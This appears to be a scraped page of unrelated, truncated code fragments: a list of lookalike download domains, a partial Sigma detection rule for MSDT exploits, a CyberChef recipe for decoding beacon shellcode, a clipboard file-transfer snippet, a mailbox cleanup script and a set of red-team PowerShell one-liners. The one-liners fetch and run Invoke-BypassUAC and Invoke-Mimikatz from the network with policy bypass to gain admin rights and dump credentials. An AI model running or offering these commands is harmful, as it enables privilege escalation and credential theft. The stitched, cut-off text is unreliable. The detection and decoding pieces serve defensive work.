Domain names:
138.124.183.79.sslip.io
7-zip.cfd
7-zip.day
advanced-ip-scanner.cfd
advanced-ip-scanner.link
advancedipscannerapp.com
title: Sysmon Office MSDT | |
id: c95ed569-5da4-48b3-9698-5e429964556c | |
description: Detects MSDT Exploit Attempts | |
status: experimental | |
author: kevthehermit | |
date: 2022/05/30 | |
references: | |
- https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon | |
- https://gist.github.com/kevthehermit/5c8d52af388989cfa0ea38feace977f2 | |
logsource: |
[{"op":"Conditional Jump","args":["bxor",false,"Decode_Shellcode",10]},{"op":"Label","args":["Decode_beacon"]},{"op":"From Base64","args":["A-Za-z0-9+/=",true]},{"op":"Decode text","args":["UTF-16LE (1200)"]},{"op":"Regular expression","args":["User defined","[a-zA-Z0-9+/=]{30,}",true,true,false,false,false,false,"List matches"]},{"op":"From Base64","args":["A-Za-z0-9+/=",true]},{"op":"Gunzip","args":[]},{"op":"Label","args":["Decode_Shellcode"]},{"op":"Regular expression","args":["User defined","[a-zA-Z0-9+/=]{30,}",true,true,false,false,false,false,"List matches"]},{"op":"Conditional Jump","args":["",false,"",10]},{"op":"From Base64","args":["A-Za-z0-9+/=",true]},{"op":"XOR","args":[{"option":"Decimal","string":"35"},"Standard",false]}] |
# Description: | |
# Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing. | |
# Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command] | |
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'" | |
# Invoke-Mimikatz: Dump credentials from memory | |
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds" | |
# Import Mimikatz Module to run further commands |
## Powershell method of transfering small (< 1 MB) binary files via Clipboard | |
## | |
## NB: Unwise to attempt to encode binary files exceeding 1 MB due to excessive memory consumption | |
## Powershell 5.0> | |
# On the transmission end: | |
$Content = Get-Content -Encoding Byte -Path binaryfile.xxx | |
[System.Convert]::ToBase64String($Content) | Set-Clipboard | |
# On the receiving end |
# This script remove the local Offline Address Book files and sets the | |
# registry key to disable automatic download of the OAB | |
$OFS = "`r`n`r`n" | |
[System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic') | Out-Null | |
try { | |
$username = [Microsoft.VisualBasic.Interaction]::InputBox("Input username", "User", "") | |
$User = New-Object System.Security.Principal.NTAccount($username) | |
$sid = $User.Translate([System.Security.Principal.SecurityIdentifier]).value | |
} catch { |